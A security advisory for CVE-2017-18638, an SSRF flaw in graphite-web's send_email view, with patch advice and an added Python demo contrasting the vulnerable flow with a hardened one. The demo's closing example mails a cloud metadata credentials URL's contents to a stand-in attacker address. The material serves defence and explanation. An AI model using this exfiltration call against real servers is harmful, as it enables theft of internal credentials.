PT-2019-8550 · Graphite

Published

2019-10-11

·

Updated

2023-08-09

·

CVE-2017-18638

CVSS v4.0

8.7

High

Vector AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Name of the Vulnerable Software and Affected Versions: Graphite (graphite-web) versions through 1.1.5
Description: The send_email view in graphite-web/webapp/graphite/composer/views.py is vulnerable to Server-Side Request Forgery (SSRF). An unauthenticated attacker can make the Graphite web server request an arbitrary URL, including services reachable only from the server itself or from its internal network. The response body is wrapped into an image attachment and e-mailed to a recipient address that the attacker also supplies, so whatever the server fetched is exfiltrated directly. The mail is relayed through the SMTP server configured in Graphite, which defaults to 'localhost'.
Recommendations: For Graphite versions through 1.1.5, update to graphite-web 1.1.6 or apply the patches released for the graphite-web 1.0.x and 0.9.x branches. As a temporary workaround, remove the send_email view from webapp/graphite/composer/views.py together with the URL pattern that maps to it; the Graphite UI does not use this function, so removing it does not affect normal operation.
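
The following is an added example, not graphite-web's own code. It models the data flow the description gives (caller-supplied URL fetched server-side, response attached as an image and mailed to caller-supplied recipients) next to a constrained version of the same flow. The upstream fix removed the endpoint outright; the checks in the hardened variant show what an SSRF guard has to cover if a feature like this were kept. The request parameter names `url` and `to`, the fake fetcher and SMTP recorder, and the allowlist values are assumptions made for the demo.

```python
"""Added illustration of the SSRF data flow in CVE-2017-18638.

Not graphite-web's code. Parameter names ("url", "to"), the fetch and SMTP
stand-ins and the allowlist values are assumptions for this demo.
"""
import email
from dataclasses import dataclass, field
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from ipaddress import ip_address
from urllib.parse import urlsplit

# Constructed resources "reachable" only from the Graphite host.
RESOURCES = {
    "http://169.254.169.254/latest/meta-data/iam/": b"role-creds: AKIA...",
    "http://127.0.0.1:8080/admin": b"<h1>internal admin</h1>",
    "http://graphite.example.internal/render?target=cpu": b"\x89PNG\r\n\x1a\n",
}
ALLOWED_HOSTS = {"graphite.example.internal"}  # assumed deployment value
MAIL_DOMAIN = "example.internal"               # assumed deployment value


def fake_fetch(url: str) -> bytes:
    """Stand-in for the server-side GET the view performs."""
    if url not in RESOURCES:
        raise ConnectionError(f"unreachable: {url}")
    return RESOURCES[url]


@dataclass
class FakeSMTP:
    """Records what would have been relayed via the configured SMTP server."""
    sent: list = field(default_factory=list)

    def sendmail(self, sender, recipients, payload):
        self.sent.append((sender, list(recipients), payload))


def _mail_fetched_bytes(params, fetch, smtp):
    recipients = [r.strip() for r in params["to"].split(",")]
    url = params["url"]
    raw = fetch(url)  # server-side request to a caller-chosen URL
    msg = MIMEMultipart()
    msg["Subject"] = "Graphite Image"
    msg["To"] = ", ".join(recipients)
    msg.attach(MIMEText(f"Image generated by the following graphite URL\n\n{url}"))
    # Whatever came back is attached as a "PNG"; nothing checks the content.
    img = MIMEImage(raw, _subtype="png")
    img.add_header("Content-Disposition", "attachment", filename="composer.png")
    msg.attach(img)
    smtp.sendmail("composer@graphite", recipients, msg.as_string())
    return smtp


def vulnerable_send_email(params, fetch=fake_fetch, smtp=None):
    """Vulnerable pattern: URL and recipients both come straight from the request."""
    return _mail_fetched_bytes(params, fetch, smtp or FakeSMTP())


def is_safe_url(url, allowed_hosts=ALLOWED_HOSTS):
    """Allow only http(s) to an allowlisted host; reject non-global IP literals."""
    parts = urlsplit(url)
    host = parts.hostname
    if parts.scheme not in ("http", "https") or host is None:
        return False
    try:
        if not ip_address(host).is_global:
            return False
    except ValueError:
        pass  # a hostname, not an IP literal
    return host in allowed_hosts


def hardened_send_email(params, fetch=fake_fetch, smtp=None,
                        allowed_hosts=ALLOWED_HOSTS, mail_domain=MAIL_DOMAIN):
    """Same flow with both caller-controlled inputs constrained."""
    recipients = [r.strip().lower() for r in params["to"].split(",")]
    if not is_safe_url(params["url"], allowed_hosts):
        raise PermissionError("URL host not allowlisted")
    if not all(r.endswith("@" + mail_domain) for r in recipients):
        raise PermissionError("recipient outside the mail domain")
    return _mail_fetched_bytes(params, fetch, smtp or FakeSMTP())


def refused(params) -> bool:
    """True when the hardened view rejects the request."""
    try:
        hardened_send_email(params)
    except PermissionError:
        return True
    return False


def attached_bytes(raw_message: str) -> bytes:
    """What the recipient gets back: the decoded image attachment."""
    for part in email.message_from_string(raw_message).walk():
        if part.get_content_maintype() == "image":
            return part.get_payload(decode=True)
    return b""
```

Running `attached_bytes(vulnerable_send_email({"to": "attacker@evil.example", "url": "http://169.254.169.254/latest/meta-data/iam/"}).sent[0][2])` returns the bytes of the internal resource: the "image" mailed to the attacker is simply the fetched response base64-encoded, which is the whole exfiltration path. The hardened variant refuses the same request on the URL check, and refuses an allowlisted URL sent to an outside recipient on the recipient check; both controls are needed, because either input alone is enough to make the server act on the attacker's behalf.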

Exploit · Fix · SSRF

Related Identifiers

CVE-2017-18638
DLA-1962-1
GHSA-VFJ6-275Q-4PVM
PYSEC-2019-151
SUSE-SU-2019:2803-1
USN-6243-1
USN-6243-2

Affected Products

Graphite
Linuxmint
Ubuntu